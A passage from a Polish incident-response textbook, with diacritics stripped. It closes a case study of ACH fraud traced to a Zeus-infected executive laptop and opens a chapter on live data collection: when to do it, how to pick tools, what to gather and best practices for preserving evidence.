Oczekujc na zakoczenie procesu pobierania danych z komputera dyrektora finansowego,
zaczynasz bada nieznany adres IP. Poniewa adresy w sieci s przydzielane przez DHCP,
postanawiasz przejrze dzienniki serwera DHCP, aby dowiedzie si czego wicej. Szukasz wic
interesujcego Ci adresu IP w rekordach dotyczcych odpowiedniego dnia i dowiadujesz si,
e by przypisany do adresu MAC karty bezprzewodowej w laptopie dyrektora finansowego.
Okazuje si wic, e nie musisz bada adnego innego komputera, poniewa wszystkie wstpne
dowody wskazuj, i incydent dotyczy tylko jednego laptopa. Jako e gromadzenie danych jeszcze
si nie zakoczyo, zabezpieczasz kopi wszystkich dziennikw zapory sieciowej.
Nastpnie postanawiasz ponownie porozmawia z dyrektorem finansowym, aby zdoby wicej
informacji kontekstowych dotyczcych jego komputera. Podczas rozmowy dowiadujesz si
nastpujcych rzeczy.
Dyrektor by wczoraj w pracy, ale wyszed o 16:30.
Dyrektor mia spotkanie przed wyjciem z pracy. Spotkanie to odbyo si w sali konferencyjnej
i w tym czasie dyrektor korzysta z firmowej sieci bezprzewodowej. Tematem spotkania
byo porwnanie usug banku, z ktrego aktualnie korzysta firma, z usugami konkurencji.
Podczas narady dyrektor wchodzi na stron banku, ale nie korzysta z usug bankowoci
internetowej.
Dyrektor utrzymuje, e nie wykona nieautoryzowanego przelewu oraz nic nie wie
o numerze docelowego konta tej operacji.
Gromadzenie danych pocztkowych dobiega koca, wic zaczynasz planowa dalsze postpowanie
w ledztwie. Najpierw przypomnijmy sobie, co ju wiemy i jakie zgromadzilimy dowody.
Przegld dziennikw zapory sieciowej pozwoli wykry poczenia z komputera dyrektora
finansowego z bankiem w badanym czasie. Nie byo pocze z innych komputerw.
Dyrektor finansowy twierdzi, e nie wykonywa adnego przelewu i nie byo go w biurze
w czasie, gdy operacj t zlecono. Twoja firma nie pozwala na zdalny dostp do komputerw
pozostawionych w biurze.
Masz dzienniki zapory sieciowej z ostatnich dwch tygodni.
Masz dane z analizy na ywo, zrzut pamici i obraz dysku twardego z komputera dyrektora
finansowego.
Na podstawie tych operacji moemy zaplanowa dalsze postpowanie. Skoro komputer

dyrektora finansowego by poczony z bankiem w czasie, gdy doszo do zlecenia nieautoryzowanego
przelewu, ale samego dyrektora w tym czasie nie byo w biurze, mona przedstawi nastpujce
teorie do sprawdzenia.
Moe kto wszed do biura dyrektora i uy jego komputera mona sprawdzi
w dziennikach systemu Windows, kto i kiedy si logowa. Ponadto dobrze by byo
te przejrze zapis z kamer monitoringu, aby sprawdzi, czy kto wchodzi do biura.
Moe w komputerze dyrektora znajduje si niewykryty wirus dajcy hakerowi zdalny
dostp do systemu mona przeanalizowa zebrane dane w celu poszukania podejrzanych
programw uruchamianych wraz z systemem lub artefaktw utworzonych w interesujcych
nas ramach czasowych.
Stwierdzamy, e jest mao prawdopodobne, aby kto wszed do biura dyrektora finansowego
w okolicach godziny 16:37, poniewa przestrze wok jest otwarta i taka osoba zostaaby atwo
zauwaona przez innych pracownikw. W zwizku z tym postanawiamy dokadniej przyjrze si
teorii wirusa. Zaczynamy od przejrzenia danych z analizy na ywo i zawartoci obrazu dysku.
Przychodzi Ci do gowy myl, e dodatkowo warto dokadnie przejrze dzienniki zapory sieciowej
pod ktem ruchu, jaki mia miejsce po wyjciu dyrektora z biura. Uznajesz, e na razie artefakty
najatwiej powinno da si znale w systemie, wic przegld dziennikw zapory zostawiasz na pniej,
gdy ju przeanalizujesz system. Podczas badania dowodw z komputera dyrektora odkrywasz
niedawno zainstalowany na stae plik wykonywalny. Wysyasz go do analizy do zewntrznej
firmy, w ktrej zostaje on zidentyfikowany jako wariant wirusa bankowego Zeus. Firma ta
dostarcza Ci dodatkowo wskaniki zagroenia, dziki czemu koczysz ledztwo nastpujcymi
czynnociami.
Wykonujesz dokadn analiz ledcz komputera dyrektora finansowego. Musisz jeszcze
dowiedzie si, kiedy i jak doszo do infekcji.
Badasz wszystkie komputery w firmie za pomoc specjalnego narzdzia do szukania
wskanikw zagroenia nazw plikw, kluczy rejestru i innych cech charakterystycznych
wirusa.
Szukasz w dziennikach zapory sieciowej ladw wskazujcych, e inne komputery te mog
by zainfekowane, czyli ruchu do adresu IP, z ktrym komunikuje si wirus.
ledztwo dobiega koca, wic moemy zastanowi si na tym, jaki wpyw na jego przebieg
mogoby mie podjcie innych decyzji.
Oszustwo ACH nieprawidowa identyfikacja zasigu incydentu

W tym przypadku dane wstpne umoliwiy identyfikacj dobrych tropw. Jednak mimo to,
wystarczyaby jedna niepoprawna konkluzja, aby skierowa dochodzenie na cakiem inny tor.
Oto dwa przykady.
Niemdra decyzja. Program antywirusowy i system monitorowania wskanikw

zagroenia ostatnio nie zgaszay adnych zastrzee, wic dochodzisz do wniosku, e
problem ley po stronie banku. Odrzucasz wic twierdzenia banku, e w Twojej firmie s
problemy z bezpieczestwem, i sugerujesz, aby to bank rozwiza problem ze swojej strony.
Jako e w transakcji uyto prawidowego numeru konta, uwaasz, e bank powinien
we wsppracy z odpowiednimi organami wytropi sprawc i wsadzi go do wizienia.
Problem. Nikt nie sprbowa sprawdzi danych wstpnych przekazanych przez bank.
W firmie przyjto zaoenie, e wdroone zabezpieczenia sieciowe wykryyby problem,
gdyby wystpi. Ponadto zaoono, e zaangaowanie dodatkowych organizacji zewntrznych
powinno by korzystne dla ledztwa. W kocu, jeli za jaki czas zechcesz jednak przeanalizowa
dane sieciowe, moe si okaza e cz wanych ladw bdzie zatarta.
Niemdra decyzja. Dyrektor generalny uwaa, e instytucje finansowe maj odpowiednie
zabezpieczenia wanie przed tego rodzaju problemami, wic zleceniodawc przelewu musi
by dyrektor finansowy. W zwizku z tym dyrektor generalny nakazuje wszcz ledztwo
w tajemnicy przed dyrektorem finansowym, ktry jest gwnym podejrzanym.
Problem. Nawet gdyby byy wczone zabezpieczenia, np. dwuskadnikowe uwierzytelnianie,
aden system nie jest w peni bezpieczny. Ponadto tego rodzaju ledztwo wychodzi poza
Twoje kompetencje, wic powiniene zasugerowa dyrektorowi generalnemu, aby poszuka
pomocy z zewntrz.
I CO Z TEGO
Okrelenie zasigu incydentu ma krytyczne znaczenie dla szybkiego przeprowadzenia skutecznego
ledztwa. Wiedzc, jaki jest zasig incydentu, moesz lepiej wykorzysta posiadane zasoby ludzi
i technologie. Proces, ktry opisalimy w tym rozdziale, pozwala prawidowo oceni, jak bardzo
rozprzestrzeniona jest szkodliwa aktywno w rodowisku, efektywnie alokowa zasoby, skupi si
na waciwych czynnociach oraz w kocu znale dowody pozwalajce rozwiza spraw.
PYTANIA
1. Jeli rda dowodw nie obejmuj wielu niezalenych kategorii, co zrobisz, aby zwikszy
pewno dotyczc poprawnoci swoich wnioskw?
2. Wymyl wasn sensown teori na temat tego, w jaki sposb haker mg zdoby dostp
do komputera dyrektora finansowego w przypadku oszustwa ACH. Jak poprowadziby
ledztwo na podstawie tej teorii?
3. W przypadku wycieku danych wykonano szereg czynnoci, aby zweryfikowa skargi
uytkownikw. Wymie przynajmniej dwie inne czynnoci, ktre mogyby pomc
w weryfikacji tych skarg lub wykryciu rda przecieku.
CZ III
Gromadzenie danych
ROZDZIA 7.
Zbieranie danych
na ywo
D
ane na ywo gromadzi si w prawie kadym ledztwie w sprawie incydentu bezpieczestwa
komputerowego. Robi si to przede wszystkim w celu zabezpieczenia ulotnych dowodw,
ktre mog by bardzo pomocne w dochodzeniu. Ponadto czsto gromadzimy take
wszelkie dodatkowe informacje, ktre da si szybko zapisa, np. dzienniki i listy plikw. Dziki
temu atwiej nam znale odpowiedzi na niektre pytania bez wykonywania czasochonnej operacji
kopiowania zawartoci caego dysku. W wielu przypadkach zbieranie i analiza danych na ywo
pozwala na uzyskanie szybkich odpowiedzi, co redukuje ryzyko utraty informacji i wystpienia
negatywnych skutkw incydentu. Ponadto wyniki te powinny pomc w podjciu decyzji, czy
konieczne jest wykonanie obrazu caego dysku twardego.
Ze zbieraniem danych na ywo wie si jednak pewne ryzyko. Przede wszystkim naley
stara si, aby proces ten spowodowa jak najmniej zmian w systemie. Jeli kto nie uyje narzdzia
automatycznego, moe spowodowa wiele niepotrzebnych modyfikacji co z kolei moe negatywnie
wpyn na dziaanie firmy, zniszczy dowody albo zaalarmowa hakera. W niektrych przypadkach
gromadzenie danych na ywo moe doprowadzi do awarii systemu. Dlatego naley si do tej
operacji bardzo dobrze przygotowa i wykona j z naleyt pieczoowitoci.
W rozdziale tym opisujemy kilka zagadnie dotyczcych efektywnego gromadzenia danych
na ywo i minimalizowania zwizanego z tym ryzyka. Wyjaniamy, po co w ogle si to robi,
kiedy najlepiej to robi oraz jakiego rodzaju dane najczciej mona w ten sposb zdoby.
Ponadto przedstawiamy metody gromadzenia danych na ywo w najpopularniejszych systemach
operacyjnych. Wicej wartociowych informacji na ten temat mona znale w dokumencie
RFC 3227 pt. Guidelines for Evidence Collection and Archiving.
W INTERNECIE
www.ietf.org/rfc/rfc3227.txt
Ostrzeenie Podejmowane przez Ciebie decyzje dotyczce tego, kiedy i jak zareagowa w systemie,
maj bezporedni wpyw na jako gromadzonych dowodw, wysnuwanych na ich podstawie
wnioskw oraz ewentualnego uznania w sdzie. Skutki podjtych decyzji mog mie te duy
wpyw na ca organizacj. Dlatego podczas planowania i wykonywania reakcji na ywo naley
mie na uwadze te kwestie.
KIEDY WYKONYWA ANALIZ NA YWO

Analizy na ywo najczciej wykonujemy podczas ledztw w sprawie wama, cho czasami
posugujemy si t metod take w innych sprawach. Podejmujc decyzj, czy reakcja na ywo
jest uzasadniona w konkretnym przypadku, naley rozway pi wanych czynnikw.
ROZDZIA 7. ZBIERANIE DANYCH NA YWO 157
1. Czy jest jakikolwiek powd, by przypuszcza, e dane ulotne zawieraj niezbdne

dla ledztwa informacje, ktrych nie ma nigdzie indziej?
2. Czy analiz na ywo mona przeprowadzi idealnie, tzn. tak, aby zminimalizowa ilo
zmian w systemie docelowym?
3. Czy liczba dotknitych systemw jest na tyle dua, e nie da si wykona klonu kadego
z nich?
4. Czy istnieje ryzyko, e wykonywanie duplikatu systemu zajmie bardzo duo czasu lub moe
zakoczy si niepowodzeniem?
5. Czy istniej jakie prawne lub inne kwestie, ktre sugeruj, e powinno si zabezpieczy
jak najwicej danych?
Analiza na ywo ma te pewne wady. Proces ten moe spowodowa awari systemu, a nawet
zniszczenie dowodw. Aby oceni, czy jego wykonanie nie jest zbyt ryzykowne, odpowiedz sobie
na ponisze pytania.
Czy wykonywae ju analiz na ywo podobnego systemu?
Czy system ten jest bardzo wraliwy na kwestie wydajnoci?
Co si stanie, jeli dojdzie do awarii tego systemu?
Czy skontaktowae si ze wszystkimi akcjonariuszami i masz ich zgod? W niektrych
przypadkach warto uzyska potwierdzenie zgody na pimie.
Klienci czsto maj wtpliwoci dotyczce potencjalnych zmian w systemie oraz implikacji
wykonania analizy na ywo dla integralnoci. Niektrzy puryci twierdz, e w systemie nie
powinno si robi absolutnie nic, co mogoby zmieni jego aktualny stan. Jednak w przypadku
ledztwa w sprawie incydentu takie podejcie prowadzi do lepego zauka. Nie ma procesw
pozwalajcych specjalicie porozumie si z komputerem bez zmienienia w nim niczego.
W momencie nacinicia jakiegokolwiek klawisza na klawiaturze, nawizania poczenia
sieciowego, podczenia pamici USB lub uruchomienia programu natychmiast dochodzi do
zmian w systemie. Podczas wyczania systemu take nastpuje wiele zmian oraz skasowanie
danych ulotnych, np. zawartoci pamici. Wprawdzie zmian zwizanych z procesem zamykania
mona unikn przez odczenie zasilania od komputera, ale dane ulotne i tak zostan utracone,
a dodatkowo istnieje ryzyko uszkodzenia danych trwaych z powodu nieoprnienia buforw
w prawidowy sposb.
Skoro zatem zmiany s nieuniknione, naley skupi si na ich ograniczeniu do minimum
i skrupulatnie opisa wszystko, co si robi. Ponadto pamitaj, e bierno jest z reguy
niedopuszczalna. W kadej chwili mog zosta bezpowrotnie utracone wane dowody. Krtko
mwic, protok reakcji na zagroenie naley wdroy natychmiast po nabraniu podejrze,
e doszo do zamania zabezpiecze systemu.
WYBR NARZDZIA DO ANALIZY NA YWO

Gdy pisalimy poprzednie wydanie tej ksiki, narzdzia do analizy na ywo trzeba byo tworzy
samodzielnie, np. w postaci skryptu wsadowego Microsoft DOS. Obecnie dostpnych jest ju
kilka gotowych rozwiza od kompletnych produktw komercyjnych, przez otwarte i darmowe
rozwizania, po rozbudowane skrypty domowej roboty wykonujce zestaw programw lub
wykorzystujce API systemowe do gromadzenia informacji. Decydenci powinni sami zdecydowa,
co w danym przypadku jest najlepsze. Jako e techniki analizy na ywo i metody ledcze cigle
ewoluuj, naley nieustannie sprawdza, czy stosowane narzdzia i procedury s wci odpowiednie.
W firmie, w ktrej pracujemy, preferowany zestaw narzdzi do analizy na ywo powsta w toku
powolnej ewolucji. Najpierw utworzylimy i modyfikowalimy skrypt wsadowy (albo BASH
w systemach Unix i BSD) sucy do uruchamiania poszczeglnych narzdzi. I cho rozwizanie to
dawao nam szczegow kontrol nad caym procesem, wymagao te cigej obsugi serwisowej.
Pniej zmienilimy je na skrypt Perl, ktry gromadzi wicej informacji samodzielnie, wic
wymaga mniej uwagi przy serwisowaniu. Dzi ju praktycznie nie uywamy wasnych skryptw.
Istnieje kilka narzdzi do analizy na ywo zarwno darmowych, jak i patnych, ktre speniaj
nasze wymagania. Dalej w tym rozdziale przedstawiamy rozwizania najczciej uywane przez
nas, ale pamitaj, e Ty moesz mie inne potrzeby, wic najlepiej samodzielnie poszukaj czego
odpowiedniego dla siebie. Oceniajc przydatno narzdzia do analizy na ywo, warto wzi pod
rozwag nastpujce czynniki.
Czy jest to narzdzie oglnie akceptowane przez specjalistw od analizy ledczej?
W rozdziale 3. pisalimy o wymaganiach, jakie dowody musz spenia, aby zostay uznane
przez sd. Oglnie rzecz biorc, w ledztwie naley uywa takich narzdzi i stosowa takie
procedury, aby pniej nie byo problemu z uznaniem ich wynikw przed sdem. Aby co
byo akceptowalne, musi spenia szereg wymaga zwizanych m.in. ze sposobem rejestrowania
danych w dziennikach, metodami przechowywania informacji, wykorzystaniem kryptograficznych
sum kontrolnych oraz procedurami i algorytmami postpowania. Jeli uyjesz narzdzi,
ktre nie s powszechnie akceptowane i znane w rodowisku ledczych, zwikszasz ryzyko
zakwestionowania przedstawianych przez Ciebie dowodw.
Czy rozwizanie to jest dostpne dla systemw operacyjnych uywanych w Twoim
rodowisku? Microsoft Windows to jeden z najpopularniejszych systemw operacyjnych,
ale w wielu rodowiskach uywa si mieszaniny systemw Windows, Unix, Apple i innych.
Co si dzieje, gdy dochodzi do wamania do jednego z nich? Powiniene mie narzdzia
pozwalajce wykona analiz na ywo w kadym systemie uywanym w rodowisku.
A jeli chodzi o narzdzia wykonujce polecenia systemu operacyjnego, to powinny one
wykorzystywa zaufane kopie nalece do zestawu narzdzi, a nie pliki z potencjalnie
zagroonego systemu.
Czy narzdzie zbiera wane dane w okrelonym rodowisku? Dziki wiedzy, jakie
dane s wane, atwiej wybra odpowiednie narzdzie dla swojej organizacji. Powinno si
gromadzi takie informacje, ktre daj najwiksz szans na znalezienie odpowiedzi
na najwaniejsze pytania i zdobycie tropw. Dane powinno si zbiera z uwzgldnieniem
oprogramowania i konfiguracji systemw w rodowisku. Przykadowo dobrym pomysem

moe by zebranie dziennikw z programw zabezpieczajcych i innych. Jednak w wielu
przypadkach wikszo danych z analizy na ywo pochodzi ze rde utworzonych przez
system operacyjny.
Ile czasu trwa gromadzenie danych? Celem analizy na ywo jest szybkie zdobycie
odpowiedzi na niektre pytania. Dlatego zbieranie informacji nie powinno trwa dugo.
Lubimy, gdy proces w pojedynczym systemie trwa krcej ni godzin.
Czy da si zmienia ustawienia narzdzia? W niektrych rodowiskach zdobycie pewnych
informacji jest problematyczne. W innych przypadkach musimy zdoby dodatkowe dane,
ktrych nie da si uzyska w ramach standardowych procesw analizy na ywo. Dlatego
narzdzie powinno mie opcje konfiguracyjne, aby mona byo ustawia, jakiego rodzaju
dane ma zbiera.
Czy wyniki s zrozumiae i przystpne? Interfejs graficzny jest bardzo przydatny, ale
lubimy te mie dostp do surowych danych, aby je przeanalizowa za pomoc swoich
skryptw lub innych narzdzi. Niektre narzdzia do analizy na ywo zwracaj wyniki
w formatach, z ktrymi trudno si pracuje. Zasadniczo niedopuszczalne s dane bez
struktury, chyba e jest ich bardzo mao. Dane strukturalne s podane, poniewa istnieje
wiele narzdzi do przegldania, sortowania i filtrowania tych formatw (np. CSV, TSV,
XML i innych). Jednak czasami nawet dane strukturalne mog sprawia kopoty, zwaszcza
gdy tre nie jest odpowiednio udokumentowana. W takich przypadkach parsowanie
i interpretacja danych mog by utrudnione.
JAKIE INFORMACJE ZBIERA

Najczciej zbieramy informacje z dwch oglnych kategorii. Do pierwszej zaliczaj si dane
opisujce aktualny stan dziaajcego systemu, np. poczenia sieciowe i uruchomione procesy.
Dane te, najczciej zawarte w pamici systemu, dostarczaj informacji pozwalajcych stwierdzi,
co si dzieje w tej chwili. Druga kategoria obejmuje informacje bardziej trwae i zapewniajce wgld
w to, co dziao si w przeszoci zaliczaj si do niej listy plikw, dzienniki systemowe i inne
dane dotyczce systemu operacyjnego i aplikacji. W wikszoci ledztw najwaniejsze pytania
dotycz tego, co wydarzyo si kiedy, poniewa zagroenia prawie zawsze s wykrywane z pewnym
opnieniem. Dlatego podczas gromadzenia danych na ywo z reguy wicej uwagi powicamy
wanie zbieraniu informacji z przeszoci, cho oczywicie czasami konieczna jest zmiana priorytetw.
W trakcie ledztwa cay czas oceniamy, ktre informacje s warte zachodu, na podstawie tego,
jak bardzo s one pomocne w szukaniu odpowiedzi na nurtujce nas pytania. Oprcz typowych
kwestii zwizanych z zabezpieczaniem dowodw, naley dodatkowo bra pod uwag okolicznoci
wystpienia incydentu. Jeeli np. sprawa dotyczy masowej infekcji wirusem, moe nie mie sensu
zakrojone na szerok skal gromadzenie informacji, ale jeli dowiesz si, e haker wykorzystuje wirus
adowany tylko do pamici, zrobienie zrzutu caej zawartoci pamici moe by bardzo wane.
Ukryte intencje
Wiele organizacji korzysta z usug gromadzenia danych bez adnego logicznego powodu
np. wykonuj kompletne kopie pamici systemowej albo klony kadego dotknitego
zagroeniem systemu. Czasami organizacje padaj po prostu ofiar propagandy marketingowej
lub zych porad osb przedstawiajcych si jako eksperci. Nie powinno si zbiera danych,
ktrych nie da si wykorzysta efektywnie lub zrozumie. Naszym zdaniem najlepiej wypracowa
metody postpowania na podstawie wasnych moliwoci analitycznych, aby mona byo jak
najszybciej okreli wpyw incydentu na rodowisko. Pamitaj, e instalacja szkodliwego programu
to nie cel hakera, tylko rodek do osignicia innego celu. Dlatego naley poda za tropem
i stara si ustali, co naprawd haker chce zrobi.
Cho kady system operacyjny ma swoje charakterystyczne rda dowodw, istniej te pewne
obszary wsplne prawie wszystkim systemom. Niektre dane s nieodczn czci systemu, a inne
pochodz z rnych miejsc, takich jak dzienniki. Naley podkreli, e ustawienia systemowe mog
mie bardzo duy wpyw na dostpno materiau dowodowego, a wic i na to, jak wiele uda nam
si wyjani w toku ledztwa. Kada organizacja powinna dy do rejestrowania jak najwikszej
iloci danych przy zachowaniu rozsdku. Narzdzie do analizy na ywo powinno umoliwia
gromadzenie przynajmniej takich informacji jak:
systemowe data i godzina wcznie ze stref czasow;
wersja systemu operacyjnego;
oglne informacje o systemie komputerowym, np. pojemno pamici, wielko dyskw
twardych i uywane systemy plikw;
lista usug i programw uruchamianych automatycznie wraz z systemem, np. serwerw
sieciowych, baz danych, aplikacji multimedialnych oraz klientw poczty e-mail;
lista zada automatycznie wykonywanych co okrelony czas;
lista lokalnych kont uytkownikw i przynaleno do grup;
dane o interfejsie sieciowym, wcznie z adresami IP i MAC;
tabela routingu, tabela protokou ARP oraz bufor DNS;
poczenia sieciowe wraz z powizanymi z nimi procesami;
aktualnie zaadowane sterowniki lub moduy;
pliki i inne otwarte uchwyty;
dziaajce procesy i informacje szczegowe, np. identyfikatory procesw nadrzdnych
(PID) oraz system wykonawczy;
dane konfiguracyjne systemu;
historia logowania uytkownikw z nazwami uytkownika, rdem i czasem trwania
poczenia;
dane ze standardowych dziennikw systemowych;

lista zainstalowanych programw;
dzienniki danych odpowiednich aplikacji historia przegldarki internetowej,
dzienniki programu antywirusowego itd.;
kompletna lista systemu plikw ze znacznikami czasu.
Na licie tej brakuje jednej wanej pozycji pamici systemowej. Pami to nietypowe rdo
danych, do badania ktrego potrzebne s specjalne narzdzia. Z powodw wymienionych wczeniej
zbieranie informacji z pamici nie jest rutynow czynnoci wykonywan podczas analizy na ywo.
Niemniej jednak czasami zawarto tej pamici moe mie decydujce znaczenie dla ledztwa.
Dalej w tym rozdziale opisujemy techniki gromadzenia danych z pamici w systemach Windows,
Linux, BSD oraz Apple OS X.
NAJLEPSZE PRAKTYKI GROMADZENIA DANYCH

Aby skutecznie wykorzystywa jakiekolwiek narzdzie, naley nauczy si jego obsugi. Programy
do analizy na ywo nie s tu wyjtkiem, cho mog by naprawd proste. Jak uruchamiasz swoje
narzdzie? Gdzie zapisuje ono wyniki? Czy da si sprawdzi, czy wyniki zostay zmodyfikowane?
Czy otrzymane informacje s prawidowo przechowywane? W podrozdziale tym opisujemy
najlepsze praktyki zbierania danych w procesie analizy na ywo zagroonego systemu.
Jedn z najwaniejszych naszym zdaniem czynnoci jest odpowiednie przygotowanie. Zanim
rozpoczniesz analiz na ywo prawdziwego systemu, powicz na jakim systemie testowym.
Wykonaj ca procedur kilka razy i w wicej ni jednym systemie. Dowiedz si, ile czasu trwa
proces i ile mniej wicej informacji mona z jego pomoc uzyska. Stwrz sztuczne problemy
do rozwizania, takie jak np. uszkodzone porty USB, niedziaajca karta sieciowa albo
zablokowany ekran.
Podczas zbierania informacji naley stara si minimalizowa czas interakcji z systemem oraz
liczb dokonywanych w nim zmian zarwno porednio, jak i bezporednio. Ponadto naley mie
na uwadze, e podejrzany system moe by zainfekowany wirusem. Dlatego wszystkie podczane
do niego noniki rwnie mog ulec infekcji, a wszelkie wpisane dane powiadczajce mog
wyciec. Poniej przedstawiamy list aspektw, ktre warto wzi pod uwag, aby sprawnie
przeprowadzi cay proces.
Szczegowo notuj, co i kiedy robisz. Zapisz rnic midzy czasem rzeczywistym
i systemowym. Nie zapomnij uwzgldni strefy czasowej.
Traktuj podejrzany komputer tak, jakby by grony nie posuguj si nim,
chyba e masz plan. Wchod do niego i wychod z niego jak najszybciej.
Korzystaj z narzdzi, ktre w jak najmniejszym stopniu wpywaj na badany system.
Staraj si nie uywa narzdzi z graficznym interfejsem uytkownika. Zamiast tego stosuj
narzdzia zuywajce jak najmniej pamici i powodujce jak najmniej zmian w systemie.
Uywaj programw rejestrujcych swoje wyniki i obliczajcych dla nich kryptograficzne

sumy kontrolne podczas ich tworzenia (a nie ju po fakcie).
Stosuj w peni automatyczny proces gromadzenia danych, najlepiej cakowicie eliminujc
interakcj czowieka z podejrzanym komputerem.
Staraj si rozpocz zbieranie danych od najbardziej ulotnych rde.
Traktuj gromadzone dane jak materia dowodowy stosuj si do standardowych procedur
przechowywania informacji, tzn. uywaj metek dowodw i kontroluj formalnie pochodzenie
danych. Nie zapomnij obliczy sumy kontrolnej MD5 dla posiadanych dowodw.
Wszystkie pliki znajdujce si na nonikach podczanych do podejrzanego komputera
uwaaj za wykradzione przez hakera. W zwizku z tym na nonikach sucych do
przeprowadzania analizy na ywo nie przechowuj wskanikw, dokumentw, raportw,
notatek ani niczego innego.
Wszelkie dane powiadczajce wpisane w podejrzanym komputerze traktuj jako utracone
na rzecz hakera. Najlepiej nie uywa gwnego konta i czsto zmienia haso lub
wykorzystywa uwierzytelnianie dwuskadnikowe albo hasa jednorazowe.
Nie podejmuj adnych czynnoci mogcych spowodowa niepotrzebne zmiany w podejrzanym
komputerze, chyba e nie masz innego wyjcia np. musisz skopiowa program do analizy
na ywo do systemu albo zapisa w systemie wyniki tej analizy. Moe to spowodowa utrat
cennych dowodw. Uywaj wymiennych nonikw danych, np. udziaw sieciowych lub
innych nonikw zdalnych.
Nie wykorzystuj podejrzanego komputera do przeprowadzenia analizy. Spowoduje to
niepotrzebne zmiany w tym systemie i moe przyczyni si do zniszczenia dowodw,
utrudniajc rozrnienie aktywnoci hakera i analityka. Ponadto nie wiadomo, w jakim
stanie znajduje si system moe dostarcza nieprawidowych wynikw.
Czytajc t list, moesz sobie pomyle: Kto mgby zrobi co takiego? albo To przecie
oczywiste!. Jednak niejednokrotnie spotykalimy u naszych klientw bardzo szkodliwe procedury
standardowego postpowania. W niektrych firmach standardowym dziaaniem jest skopiowanie
pakietu narzdzi do analizy na ywo na zagroony komputer i zapisane zgromadzonych danych
w tym systemie. Niektre firmy zapisuj nawet zrzuty caej pamici, ktra zajmuje wiele gigabajtw
danych na dysku systemowym. Inne firmy loguj si zdalnie przy uyciu konta administratora
domeny i uruchamiaj jakie programy typu netstat albo Meneder zada, aby dowiedzie si,
o co chodzi. S te tacy, ktrzy wci myl, e najlepszym sposobem na zachowanie dowodw
jest odczenie zasilania, poniewa wszystko, co robisz, powoduje zmiany na dysku twardym.
Jeli w Twojej organizacji stosowane s podobne metody, najprawdopodobniej nie przyjto w niej
najlepszych praktyk postpowania i naley co z tym zrobi.
Trzeba jednak przyzna, e niejednokrotnie widzielimy te przypadki bardzo dobrego
postpowania w sytuacji zagroenia. Zwaszcza jedna organizacja wdroya procesy, ktre naszym
zdaniem zasuguj na uwag. Utworzono w niej udzia sieciowy na specjalnym serwerze plikw
z dwoma folderami. Serwer ten nie nalea do adnej domeny, a dostp do udziau mona byo
uzyska za pomoc mao wanych danych powiadczajcych nieuywanych nigdzie w tej organizacji.
Pierwszy folder by tylko do odczytu i zawiera zestaw narzdzi do analizy na ywo. Drugi folder
by z prawem do zapisu i suy do przechowywania wynikw analizy. Procedura postpowania
analityka bya nastpujca.
1. Przejcie do udziau (lub zmapowanie litery dysku) z podejrzanego systemu.
2. Uruchomienie programu do analizy na ywo bezporednio z udziau i skierowanie wynikw
do folderu znajdujcego si na udziale. Najlepiej, aby by to podfolder o nazwie zawierajcej
niepowtarzalny identyfikator, np. numer metki dowodu.
3. Po zakoczeniu procesu zbierania informacji analityk wraca do swojego komputera
i przenosi dane uzyskane podczas analizy z tymczasowej lokalizacji na udziale do osobnego
serwera przechowujcego dane analityczne w sposb trway i majcego odpowiednie
ustawienia kontroli dostpu.
Uwaga Oczywicie proces ten mona jeszcze bardziej zabezpieczy, np. przez fizyczne oddzielenie serwera
do przechowywania dowodw od niebezpiecznej sieci i rejestrowanie oraz nadzorowanie zdarze
dostpu. Take sam procedur mona zoptymalizowa, aby zminimalizowa moliwo wystpienia
bdu ludzkiego i zapewni jak najwiksz spjno informacji, np. przez utworzenie odpowiedniego
folderu wyjciowego.
Metoda ta pozwala zminimalizowa zmiany w podejrzanym systemie i uatwia wewntrznemu

specjalicie informatykowi (nie czonkowi zespou RI) przeprowadzenie analizy na ywo. Jest to
tylko jedna z wielu sprytnych metod, jakie organizacje mog wdroy w celu gromadzenia danych
na ywo w efektywny i akceptowalny sposb.
Podczas prowadzenia analizy na ywo pojawiaj si te problemy z ograniczeniami dostpu.
To, jakiego konta uytkownika uyjesz, moe mie wpyw na to, czy uda Ci si zgromadzi
odpowiednie dane. W systemach uniksowych oznacza to, e proces musi by prowadzony przy
uyciu konta uytkownika root i polecenia typu sudo. W systemach Microsoft Windows take
naley uywa konta z uprawnieniami administratora systemu. W systemach Windows Vista
i Windows 7 firma Microsoft wprowadzia technologi kontroli dostpu uytkownikw
(ang. User Access Control UAC). Wikszo nowych narzdzi do analizy na ywo automatycznie
wsppracuje z t technologi, ale czasami moe by konieczne uruchomienie programu jako
administrator, nawet jeli biecy uytkownik ma uprawnienia administratora.
Czasami zdarzaj si systemy, do ktrych nie mona podczy wymiennych nonikw danych.
Moe to by spowodowane awari sprztu, mie zwizek z konfiguracj systemu lub wynika
z czego innego. Na tak ewentualno naley przygotowa si zawczasu i opracowa metod
wykonywania analizy na ywo bez moliwoci podczania przenonych nonikw danych do
systemu. Znajd sposb na uruchamianie swoich programw i przechowywanie ich wynikw.
Najczciej wykorzystuje si pyty CD-ROM, DVD i udziay sieciowe (SMB/CIFS lub NFS).
Ewentualnie wyniki mona zapisywa w udziale sieciowym i za pomoc szyfrowanego sieciowego
narzdzia do strumieniowania, takiego jak np. cryptcat lub stunnel. Przemylenie tych kwestii
zawczasu i przetestowanie rnych rozwiza pozwala szybko reagowa, gdy co idzie nie po myli
lub si zmieni.
Kolejn trudnoci, z jak by moe trzeba bdzie si zmierzy, jest istnienie systemw,
dla ktrych nie ma automatycznych narzdzi do wykonywania analizy na ywo. Wielokrotnie
zdarzao nam si myle, e pracujemy w okrelonym systemie operacyjnym, aby pniej odkry,
e to jednak inny system. W takich przypadkach zastanawiamy si, czy mona zaktualizowa
lub zmodyfikowa istniejcy zestaw narzdzi. Jeli nie, z reguy wdraamy rozwizania rczne.
Tworzymy list kontroln na podstawie czynnoci automatycznie wykonywanych przez narzdzia
analityczne w podobnym systemie. Sprawdzamy opcje wiersza polece, aby sporzdzi odpowiedni
list kontroln, a potem testujemy j w miar moliwoci na znanych czystych systemach.
Wykonywanie rcznej analizy w mao znanym systemie jest ryzykowne. Trzeba to ryzyko
rozway i zastanowi si, czy warto je podejmowa.
Dalej opisujemy techniki wykonywania analizy na ywo w dwch najpopularniejszych
rodzajach systemw operacyjnych Microsoft Windows i uniksowych, takich jak np.
Apple OS X.
Automatyzacja
Wczeniej wielokrotnie przewino si sowo automatyzacja odmieniane na rne sposoby.

Pewnie zastanawiasz si, dlaczego to takie wane. Wiemy ju, e dziki niej mona
wyeliminowa bd ludzki oraz ujednolici i przyspieszy procesy. Podczas reakcji na incydent
automatyzacja moe te pomc w ukryciu przed zoczycami naszej dziaalnoci. Kiedy
